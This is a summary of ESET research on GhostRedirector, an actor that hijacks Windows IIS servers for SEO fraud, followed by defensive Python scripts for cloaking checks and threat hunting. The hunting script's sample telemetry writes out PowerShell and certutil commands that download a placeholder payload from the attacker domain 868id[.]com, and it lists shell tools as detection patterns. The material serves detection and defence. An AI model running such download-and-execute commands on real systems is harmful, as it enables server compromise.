GhostRedirector hijacks Windows servers for SEO fraud

September 4, 2025 at 12:00 AM

ESET researchers uncovered GhostRedirector, a previously unknown, China-aligned threat actor abusing Windows servers to both backdoor systems and run SEO fraud. The group blends a passive C++ backdoor (Rungan) with a malicious native IIS module (Gamshen) to persist, execute commands, and secretly manipulate Google search rankings.

Key takeaways

  • At least 65 Windows servers were compromised (Dec 2024–Jun 2025), largely in Brazil, Thailand, Vietnam, Peru, and the USA (often as rented infrastructure).
  • Victims span multiple sectors: education, healthcare, insurance, transportation, technology, and retail.
  • Toolset includes: Rungan backdoor, Gamshen IIS module, privilege-escalation utilities leveraging EfsPotato/BadPotato, the Comdai helper library, Zunput site enumerator/webshell dropper, and GoToHTTP for remote access.
  • Medium-confidence attribution to a China-aligned actor based on Chinese strings, a code-signing certificate tied to a Chinese company, and Chinese-language artifacts.

How they get in

  • Likely initial access via SQL injection against public-facing apps.
  • Attackers abused sqlserver.exe (xp_cmdshell) to run PowerShell or CertUtil, pulling payloads from staging infrastructure at 868id[.]com and related domains.

Privilege escalation and persistence

  • Custom .NET tools, often obfuscated with .NET Reactor and sometimes code-signed, used EfsPotato/BadPotato to add or elevate local admin users (e.g., MysqlServiceEx, MysqlServiceEx2, Admin) or hijack the Guest account via RID techniques.
  • Attackers created fallback access through rogue admin accounts, remote access software (GoToHTTP), and webshells dropped across active IIS sites.

Rungan: passive C++ backdoor

  • Installed as miniscreen.dll, Rungan registers HTTP Server API endpoints (bypassing IIS) and waits for exact HTTP requests to activate.
  • Capabilities include: creating users, executing commands via cmd, and registering new listener URLs. Communication is plaintext HTTP with hardcoded parameters.

Gamshen: native IIS module for SEO fraud

  • Intercepts requests only from Googlebot or Google referrers and only for non-static resources that match certain URL patterns.
  • Fetches base64-encoded content from brproxy.868id[.]com and injects it into the response to create manipulative backlinks and keyword-rich pages.
  • If content injection fails and a 404 would be returned, it redirects Googlebot to gobr.868id[.]com.
  • The likely endgame: boost rankings and traffic to third-party (gambling) sites through SEO fraud as a service without changing what regular visitors see.
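The cloaking behaviour described above can be checked from the outside by requesting the same non-static URL as an ordinary browser, as Googlebot, and as a browser arriving from a Google referrer, and comparing the responses. The script below does that, with redirects left unfollowed so a 30x to an attacker domain stays visible. It is an added example written for this summary, not ESET's code and not the malware's; `fetch_live` is a plain urllib fetcher for use against your own server, and `sample_fetch` is a constructed stand-in (no network) that mimics the behaviours the text describes, with `victim.invalid` and `casino-placeholder.invalid` as made-up hostnames.

```python
"""Cloaking check for the Gamshen behaviour described above.

The same URL is requested three ways (ordinary browser, Googlebot User-Agent,
ordinary browser arriving from a Google referrer) without following redirects,
and the bot views are compared against the browser view. Divergent status
codes, a redirect the browser never sees, or outbound links present only for
Google are reported. Added example; not ESET's code and not the malware's.
"""
import re
import urllib.error
import urllib.request
from typing import Callable, Dict, List, Tuple

Response = Tuple[int, str, str]  # (status, Location header or "", body)
Fetcher = Callable[[str, Dict[str, str]], Response]

# Gamshen keys on the Googlebot User-Agent and on Google referrers, so these
# three views of one non-static URL should normally be identical.
PROFILES: Dict[str, Dict[str, str]] = {
    "browser": {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"},
    "googlebot": {"User-Agent": "Mozilla/5.0 (compatible; Googlebot/2.1; "
                                "+http://www.google.com/bot.html)"},
    "google_referrer": {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)",
                        "Referer": "https://www.google.com/"},
}

# Outbound link hosts (scheme + host only) found in a response body.
LINK_RE = re.compile(r'href="(https?://[^"/]+)', re.IGNORECASE)


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    """Return None so 3xx responses surface as HTTPError instead of being followed."""
    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


def fetch_live(url: str, headers: Dict[str, str]) -> Response:
    """Real fetcher for use against your own server; redirects are not followed."""
    opener = urllib.request.build_opener(_NoRedirect)
    try:
        with opener.open(urllib.request.Request(url, headers=headers), timeout=15) as r:
            return r.status, "", r.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as e:
        return e.code, e.headers.get("Location", ""), e.read().decode("utf-8", "replace")


def compare_views(url: str, fetch: Fetcher = fetch_live) -> Dict[str, List[str]]:
    """Fetch url under each profile; return per-Google-profile differences from the browser view."""
    views = {name: fetch(url, hdrs) for name, hdrs in PROFILES.items()}
    base_status, base_loc, base_body = views["browser"]
    base_links = set(LINK_RE.findall(base_body))
    findings: Dict[str, List[str]] = {}
    for name in ("googlebot", "google_referrer"):
        status, loc, body = views[name]
        issues = []
        if status != base_status:
            issues.append(f"status {base_status} for browser vs {status}")
        if loc and loc != base_loc:
            issues.append(f"redirect to {loc}")
        extra = sorted(set(LINK_RE.findall(body)) - base_links)
        if extra:
            issues.append("links only shown to Google: " + ", ".join(extra))
        findings[name] = issues
    return findings


def sample_fetch(url: str, headers: Dict[str, str]) -> Response:
    """Constructed stand-in for an infected site (no network), mirroring the text:
    Google views get an injected third-party link, and a page that 404s for
    browsers is instead redirected to gobr.868id[.]com for Googlebot."""
    from_google = ("Googlebot" in headers.get("User-Agent", "")
                   or "google.com" in headers.get("Referer", ""))
    missing = url.endswith("/missing.aspx")
    if from_google and missing:
        return 302, "http://gobr.868id[.]com/", ""
    if missing:
        return 404, "", "<h1>Not found</h1>"
    page = '<a href="https://victim.invalid/about">About</a>'
    if from_google:
        page += '<a href="https://casino-placeholder.invalid/">bet</a>'
    return 200, "", page


if __name__ == "__main__":
    for path in ("/products.aspx", "/missing.aspx"):
        print(path, compare_views("https://victim.invalid" + path, sample_fetch))
```

Run it against your own site by calling `compare_views(url)` with the default live fetcher; an empty issues list for both Google profiles means the server answered all three views the same way. Because Gamshen ignores static resources, point it at dynamic pages (.aspx, .php, and similar), and include at least one deliberately non-existent path to exercise the 404-to-redirect branch.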

Zunput: site mapper and webshell deployer

  • Enumerates IIS sites, confirms active dynamic content, and plants embedded ASP/PHP/JS webshells in those directories. Logs target details locally for later retrieval.

Comdai helper library

  • Shared across tools, providing user management, HTTP requests, pipe-based IPC, directory listing, and service/registry helpers. PDB paths and artifacts tie it to the same developer set.

Why attribution points to China

  • Chinese strings embedded in tools, a certificate issued to a Chinese company used for signing, and Chinese-language indicators in credentials. Overlap in victim regions and sectors with other China-aligned SEO fraud operations (e.g., DragonRank), but activity is tracked separately.

Defensive actions

  • Patch and harden public-facing apps; prioritize SQLi prevention and WAF rules.
  • Disable xp_cmdshell unless absolutely required; monitor sqlserver.exe invoking PowerShell/cmd.
  • Audit IIS: enumerate and validate all loaded native/managed modules; remove unknown DLLs.
  • Monitor HTTP Server API registrations (e.g., suspicious URLs like /v1.0/8888/sys.html).
  • Hunt for malicious admin accounts and RID hijacking; enforce LAPS and strong account hygiene.
  • Detect webshells in IIS site roots; baseline and alert on new .asp/.aspx/.php files.
  • Block and monitor staging/C2 domains linked to 868id[.]com and related infrastructure.
  • Review event logs, PowerShell transcripts, and EDR telemetry for download-and-execute chains.
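Three of the hunts above (SQL Server spawning PowerShell/cmd/CertUtil, new script files appearing in IIS site roots, and HTTP Server API URL registrations that IIS does not know about, which is how Rungan listens) can be expressed as simple rules over telemetry you already collect. The block below is an added example, not ESET's tooling: it runs over constructed Sysmon-style process and file events and over the text of `netsh http show servicestate` (any line containing a URL is considered, so the exact netsh layout is not assumed). Paths, command lines and the `PLACEHOLDER` payload name are made up; the only real value is the 868id[.]com domain the article names. The SQL Server service binary is sqlservr.exe; the summary spells it sqlserver.exe, so both spellings are matched.

```python
"""Hunting rules for the defensive actions above, plus the Rungan URL check.

Runs over constructed telemetry embedded below (not real logs): process-creation
events (Sysmon-style ParentImage/Image/CommandLine fields), file-creation events
(TargetFilename), and the text of 'netsh http show servicestate'. Added example;
not ESET's tooling.
"""
import re
from dataclasses import dataclass
from typing import Dict, Iterable, List

SQL_PARENTS = {"sqlservr.exe", "sqlserver.exe"}   # real binary name plus the article's spelling
SHELL_CHILDREN = {"powershell.exe", "pwsh.exe", "cmd.exe", "certutil.exe"}
DOWNLOAD_HINTS = ("downloadstring", "downloadfile", "invoke-webrequest",
                  "-urlcache", "http://", "https://")
WEBSHELL_EXT = (".asp", ".aspx", ".php")          # extensions the summary says to baseline
URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)


@dataclass
class Finding:
    rule: str
    detail: str


def _basename(path: str) -> str:
    return path.lower().rsplit("\\", 1)[-1]


def hunt_process_events(events: Iterable[Dict[str, str]]) -> List[Finding]:
    """Flag xp_cmdshell-style children of the SQL Server process."""
    out = []
    for e in events:
        if (_basename(e.get("ParentImage", "")) in SQL_PARENTS
                and _basename(e.get("Image", "")) in SHELL_CHILDREN):
            cmd = e.get("CommandLine", "")
            kind = ("download-and-execute" if any(h in cmd.lower() for h in DOWNLOAD_HINTS)
                    else "shell spawn")
            out.append(Finding("mssql-spawns-shell", f"{kind}: {cmd}"))
    return out


def hunt_file_events(events: Iterable[Dict[str, str]], site_roots: Iterable[str]) -> List[Finding]:
    """Flag newly created .asp/.aspx/.php files under any IIS site root."""
    roots = [r.lower().rstrip("\\") + "\\" for r in site_roots]
    out = []
    for e in events:
        path = e.get("TargetFilename", "")
        lp = path.lower()
        if lp.endswith(WEBSHELL_EXT) and any(lp.startswith(r) for r in roots):
            out.append(Finding("new-script-in-iis-root", path))
    return out


def hunt_http_sys_urls(servicestate_text: str, allowed_path_prefixes: Iterable[str]) -> List[Finding]:
    """Flag registered HTTP Server API URLs whose path is not under an allowlisted prefix.
    Rungan registers its listener URLs through this API, outside IIS, so IIS config
    never shows them; the kernel-mode http.sys registration list does."""
    allowed = [a.lower() for a in allowed_path_prefixes]
    out = []
    for m in URL_RE.finditer(servicestate_text):
        url = m.group(0)
        parts = url.split("/", 3)              # ["http:", "", "+:80", "rest/of/path"]
        path = "/" + (parts[3] if len(parts) > 3 else "")
        if not any(path.lower().startswith(a) for a in allowed):
            out.append(Finding("unexpected-http-sys-url", url))
    return out


# ---- constructed sample telemetry; paths and PLACEHOLDER names are made up ----
_SQL = r"C:\Program Files\Microsoft SQL Server\MSSQL\Binn\sqlservr.exe"
_PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_PROCESS_EVENTS = [
    {"ParentImage": _SQL, "Image": _PS,
     "CommandLine": "powershell -nop -w hidden -c \"(New-Object Net.WebClient)"
                    ".DownloadFile('http://868id[.]com/PLACEHOLDER','C:\\Windows\\Temp\\p.exe')\""},
    {"ParentImage": _SQL, "Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": "certutil -urlcache -f http://868id[.]com/PLACEHOLDER C:\\Windows\\Temp\\p.exe"},
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": _PS, "CommandLine": "powershell"},
    {"ParentImage": _SQL, "Image": r"C:\Windows\System32\cmd.exe", "CommandLine": "cmd /c whoami"},
]
SAMPLE_FILE_EVENTS = [
    {"TargetFilename": r"C:\inetpub\wwwroot\shop\images\logo.png"},
    {"TargetFilename": r"C:\inetpub\wwwroot\shop\upload\x.aspx"},
    {"TargetFilename": r"C:\Windows\Temp\a.aspx"},
]
ALLOWED_HTTP_SYS_PATHS = ["/Temporary_Listen_Addresses/", "/Reports/"]
SAMPLE_SERVICESTATE = """Registered URLs:
    HTTP://+:80/TEMPORARY_LISTEN_ADDRESSES/
    HTTP://+:80/V1.0/8888/SYS.HTML
"""
```

Feed `hunt_process_events` and `hunt_file_events` the event dictionaries your EDR or Sysmon pipeline produces, and `hunt_http_sys_urls` the captured output of `netsh http show servicestate` (the same regex also works on `netsh http show urlacl`). The allowlist for http.sys paths should be built from a known-clean server, since legitimate non-IIS services (WinRM, WSUS, SQL Reporting Services) register URLs there too; in the sample above only the Rungan-style path from the summary is reported.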

Additional resources

  • ESET provides IoCs, sample hashes, and MITRE ATT&CK mappings (Resource Development, Initial Access via Exploit Public-Facing Application, Persistence via IIS module load, Defense Evasion via obfuscation, C2 over HTTP, and Impact via search result manipulation).

Source: WeLiveSecurity
